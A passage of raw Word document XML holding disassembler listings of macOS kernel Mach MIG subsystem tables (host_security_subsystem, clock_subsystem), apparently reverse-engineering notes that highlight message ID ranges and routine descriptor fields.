        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dq 39AC0000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dd 2                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 db 2Ch, 3 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dq 2Ch                  ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dd 39AD50h              ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dd 0FFFFFF80h           ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dq 4                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dq 14000000000h         ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dd 39AF40h              ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dq 3FFFFFF80h           ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E02E70                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dq 34h                  ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02E70                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>host_security_subsystem()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E032A0                 public host_security_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E032A0 ; const host_security_subsystem host_security_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E032A0 host_security_subsystem_0 dq offset host_security_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E032A0                                         ; DATA XREF: host_security_server_routine:loc_FFFFFF800039EB52o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E032A0                                         ; host_security_server+80o ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E032A0                 </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">dd 258h </w:t>
      </w:r>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                ; start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E032A0                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>25Ah</w:t>
      </w:r>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                 ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E032A0                 dd 34h                  ; maxsize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E032A0                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E032A0                 dq 0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E032A0                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E032A0                 dq offset _Xhost_security_create_task_token; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E032A0                 dd 11h                  ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E032A0                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E032A0                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E032A0                 dd 34h                  ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E032A0                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E032A0                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E032A0                 dq 39EEF000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E032A0                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E032A0                 dd 0Dh                  ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E032A0                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E032A0                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRPr="00E71757" w:rsidRDefault="00E71757" w:rsidP="00E71757">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E71757">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E032A0                 db 2Ch, 3 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRDefault="00ED4A5C" w:rsidP="00E71757">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>clock_subsystem</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>_const:FFFFFF8000E02CD0                 public clock_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0 ; const clock_subsystem clock_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0 clock_subsystem_0 dq offset clock_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                                         ; DATA XREF: clock_server_routine:loc_FFFFFF8000398302o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                                         ; clock_server+80o ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E02CD0                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">3E8h </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                ; start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E02CD0                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">3EBh </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E02CD0                 dd 34h                  ; maxsize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
